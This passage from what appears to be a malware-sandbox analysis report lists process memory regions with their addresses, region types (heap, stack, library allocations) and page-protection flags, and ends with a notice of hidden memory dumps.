page read and write
|
||
|
197492B4000
|
heap
|
page read and write
|
||
|
1974940E000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D057D65000
|
trusted library allocation
|
page read and write
|
||
|
546B000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
trusted library section
|
page read and write
|
||
|
342E1F6000
|
stack
|
page read and write
|
||
|
197493F7000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
19749465000
|
heap
|
page read and write
|
||
|
1D05856A000
|
trusted library allocation
|
page read and write
|
||
|
197492D7000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
172BE925000
|
heap
|
page read and write
|
||
|
1D0550E0000
|
heap
|
page read and write
|
||
|
1D057358000
|
trusted library allocation
|
page read and write
|
||
|
19749552000
|
heap
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1974940E000
|
heap
|
page read and write
|
||
|
1974945A000
|
heap
|
page read and write
|
||
|
342EF4E000
|
stack
|
page read and write
|
||
|
7B1D000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D0588E5000
|
trusted library allocation
|
page read and write
|
||
|
197492B7000
|
heap
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
heap
|
page read and write
|
||
|
19749440000
|
heap
|
page read and write
|
||
|
7DF452880000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D06EF80000
|
heap
|
page read and write
|
||
|
2A20BAD000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D06F050000
|
trusted library allocation
|
page read and write
|
||
|
1D0551B0000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
342E07E000
|
stack
|
page read and write
|
||
|
79F0000
|
heap
|
page execute and read and write
|
||
|
1D066DC2000
|
trusted library allocation
|
page read and write
|
||
|
342E37E000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
4BE8000
|
trusted library allocation
|
page read and write
|
||
|
197498DE000
|
heap
|
page read and write
|
||
|
8BB0000
|
trusted library allocation
|
page read and write
|
||
|
2A3D000
|
stack
|
page read and write
|
||
|
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
|
1D054F12000
|
heap
|
page read and write
|
||
|
CDD000
|
stack
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4C9E000
|
stack
|
page read and write
|
||
|
D58000
|
heap
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
1D058954000
|
trusted library allocation
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
31CB000
|
heap
|
page read and write
|
||
|
8B90000
|
trusted library allocation
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
1D06F077000
|
heap
|
page execute and read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197492CC000
|
heap
|
page read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
754D000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197498DE000
|
heap
|
page read and write
|
||
|
1974944C000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D06EFAF000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
1D0588C3000
|
trusted library allocation
|
page read and write
|
||
|
1974944C000
|
heap
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
789A000
|
heap
|
page read and write
|
||
|
1D0588D6000
|
trusted library allocation
|
page read and write
|
||
|
1D054F34000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D0588FC000
|
trusted library allocation
|
page read and write
|
||
|
1D06EFF9000
|
heap
|
page read and write
|
||
|
19749525000
|
heap
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
8B7D000
|
stack
|
page read and write
|
||
|
1D066B01000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
7900000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4DBE000
|
stack
|
page read and write
|
||
|
7240000
|
heap
|
page execute and read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
1974944A000
|
heap
|
page read and write
|
||
|
740D000
|
stack
|
page read and write
|
||
|
1D0569E0000
|
heap
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
19749501000
|
heap
|
page read and write
|
||
|
1974944A000
|
heap
|
page read and write
|
||
|
19749431000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D056AD0000
|
heap
|
page execute and read and write
|
||
|
1D054F54000
|
heap
|
page read and write
|
||
|
1974940E000
|
heap
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
887B000
|
stack
|
page read and write
|
||
|
7902000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
342E57B000
|
stack
|
page read and write
|
||
|
1D06F024000
|
heap
|
page read and write
|
||
|
5DD1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
8755000
|
trusted library allocation
|
page read and write
|
||
|
1974944A000
|
heap
|
page read and write
|
||
|
1D0569F7000
|
heap
|
page read and write
|
||
|
19749447000
|
heap
|
page read and write
|
||
|
342F0CB000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
4F26000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197498DF000
|
heap
|
page read and write
|
||
|
172BE740000
|
heap
|
page read and write
|
||
|
730F000
|
stack
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
||
|
172BE930000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D0571C8000
|
trusted library allocation
|
page read and write
|
||
|
1D06EF30000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D06F4C0000
|
heap
|
page read and write
|
||
|
4AE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
197493F7000
|
heap
|
page read and write
|
||
|
7849000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
5E31000
|
trusted library allocation
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
3255000
|
heap
|
page read and write
|
||
|
342E2FB000
|
stack
|
page read and write
|
||
|
197494E0000
|
remote allocation
|
page read and write
|
||
|
1D06F1F8000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D066AF0000
|
trusted library allocation
|
page read and write
|
||
|
1D056B63000
|
trusted library allocation
|
page read and write
|
||
|
1D058916000
|
trusted library allocation
|
page read and write
|
||
|
342E3FF000
|
stack
|
page read and write
|
||
|
172BE74A000
|
heap
|
page read and write
|
||
|
197492B1000
|
heap
|
page read and write
|
||
|
1D056FA0000
|
trusted library allocation
|
page read and write
|
||
|
197492C3000
|
heap
|
page read and write
|
||
|
342E4FF000
|
stack
|
page read and write
|
||
|
197493F7000
|
heap
|
page read and write
|
||
|
1D06F110000
|
heap
|
page read and write
|
||
|
7A08000
|
trusted library allocation
|
page read and write
|
||
|
4DD1000
|
trusted library allocation
|
page read and write
|
||
|
1D066AE1000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
768E000
|
stack
|
page read and write
|
||
|
1D0588E1000
|
trusted library allocation
|
page read and write
|
||
|
1D058A82000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
342DE7F000
|
stack
|
page read and write
|
||
|
197492C0000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
1D054EFC000
|
heap
|
page read and write
|
||
|
7ADE000
|
stack
|
page read and write
|
||
|
1D058958000
|
trusted library allocation
|
page read and write
|
||
|
1D05839B000
|
trusted library allocation
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
734E000
|
stack
|
page read and write
|
||
|
5DF9000
|
trusted library allocation
|
page read and write
|
||
|
342E179000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D06EF37000
|
heap
|
page read and write
|
||
|
1974944C000
|
heap
|
page read and write
|
||
|
76CE000
|
stack
|
page read and write
|
||
|
1D05700F000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1974944A000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
342DB8E000
|
stack
|
page read and write
|
||
|
342DA83000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
738A000
|
stack
|
page read and write
|
||
|
4AED000
|
trusted library allocation
|
page execute and read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
342DB0E000
|
stack
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
8B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
19747538000
|
heap
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
869E000
|
stack
|
page read and write
|
||
|
DAE000
|
stack
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
1D055170000
|
trusted library section
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
865D000
|
stack
|
page read and write
|
||
|
3300000
|
trusted library section
|
page read and write
|
||
|
4B50000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
85B0000
|
heap
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
1D06F29C000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
4AF9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D0588BE000
|
trusted library allocation
|
page read and write
|
||
|
197492D3000
|
heap
|
page read and write
|
||
|
2A67000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D054F42000
|
heap
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
19747627000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
1D055000000
|
heap
|
page read and write
|
||
|
1D0569A0000
|
trusted library allocation
|
page read and write
|
||
|
1D056970000
|
trusted library allocation
|
page read and write
|
||
|
1D066DD1000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
1D056AE1000
|
trusted library allocation
|
page read and write
|
||
|
342DF7D000
|
stack
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
1D0569F0000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
1D056FA8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
4C5C000
|
stack
|
page read and write
|
||
|
4AE4000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749440000
|
heap
|
page read and write
|
||
|
4B10000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
4D7E000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
4D3F000
|
stack
|
page read and write
|
||
|
1D06EAE8000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D056F95000
|
trusted library allocation
|
page read and write
|
||
|
197492D8000
|
heap
|
page read and write
|
||
|
85A7000
|
stack
|
page read and write
|
||
|
1D06F01E000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
4B15000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
197475FA000
|
heap
|
page read and write
|
||
|
1D06F053000
|
trusted library allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
78FB000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
C9C000
|
stack
|
page read and write
|
||
|
790C000
|
heap
|
page read and write
|
||
|
197498DE000
|
heap
|
page read and write
|
||
|
1974944C000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page readonly
|
||
|
1D056D05000
|
trusted library allocation
|
page read and write
|
||
|
197495A4000
|
heap
|
page read and write
|
||
|
342EF03000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
19749711000
|
heap
|
page read and write
|
||
|
342E47E000
|
stack
|
page read and write
|
||
|
1D055160000
|
trusted library section
|
page read and write
|
||
|
4CFE000
|
stack
|
page read and write
|
There are 461 hidden memdumps, click here to show them.